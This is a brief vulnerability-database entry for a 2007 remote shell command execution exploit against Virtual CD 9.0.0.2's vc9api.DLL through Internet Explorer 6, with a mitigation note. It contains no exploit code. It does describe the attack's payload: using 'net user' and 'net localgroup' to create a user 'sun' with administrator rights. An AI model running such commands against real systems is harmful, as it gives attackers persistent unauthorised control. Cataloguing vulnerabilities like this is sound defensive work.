Vendor: Virtual CD
By: rgod
N/A
CVSS
HIGH
Remote Shell Commands Execution
Unknown
CWE
Product Name: Virtual CD
Affected Version From: Virtual CD 9.0.0.2 with vc9api.DLL version 9.0.0.57
Affected Version To: Virtual CD 9.0.0.2 with vc9api.DLL version 9.0.0.57
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
IE 6 / Virtual CD 9.0.0.2 (vc9api.DLL 9.0.0.57) remote shell commands execution exploit
This exploit allows an attacker to execute shell commands remotely on a system running IE 6 and Virtual CD 9.0.0.2 with vc9api.DLL version 9.0.0.57. The attacker can use this to add a new user 'sun' and add it to the 'Administrators' group using the 'net user' and 'net localgroup' commands.
Mitigation:
Update to a newer version of Virtual CD that does not have this vulnerability or apply patches if available.